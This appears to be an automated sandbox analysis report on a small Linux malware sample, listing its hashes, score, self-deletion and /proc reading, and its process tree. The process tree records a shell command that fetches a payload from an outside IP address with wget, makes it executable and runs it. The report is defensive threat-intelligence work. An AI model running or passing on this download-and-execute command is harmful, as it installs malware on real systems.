Analysis
-
max time kernel
139s -
max time network
151s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
06/05/2024, 23:43
Behavioral task
behavioral1
Sample
1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
2 signatures
150 seconds
General
-
Target
1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
-
Size
12KB
-
MD5
1eba58349097d69448baf6e53a7f7e15
-
SHA1
dc11244e284db40648efa137ef5c89095e81acdc
-
SHA256
9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189
-
SHA512
a0ed442be541dab5162d61a7f5b281b177c6519482f3b998dea90ca68da7446cab8c221ab28f31a79c4c45266e23e218817d26f87328f0d7d386669099ce9c4d
-
SSDEEP
192:MKrEoSxW4oomyg3FcEVBibmmjCQPwORohKEteC+xS68l+VaNbAa0NdF:MKdSxcFcuBiXjCQBYKOeC+xS68Qa6
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1575 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 -
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/self/exe 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
Processes
-
/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes1181⤵
- Deletes itself
- Reads runtime system information
PID:1575 -
/bin/shsh -c "wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.echo.telnet.x86"2⤵PID:1598
-
/usr/bin/wgetwget http://185.105.4.242/wrgjwrgjwrg246356356356/n13⤵PID:1599
-
-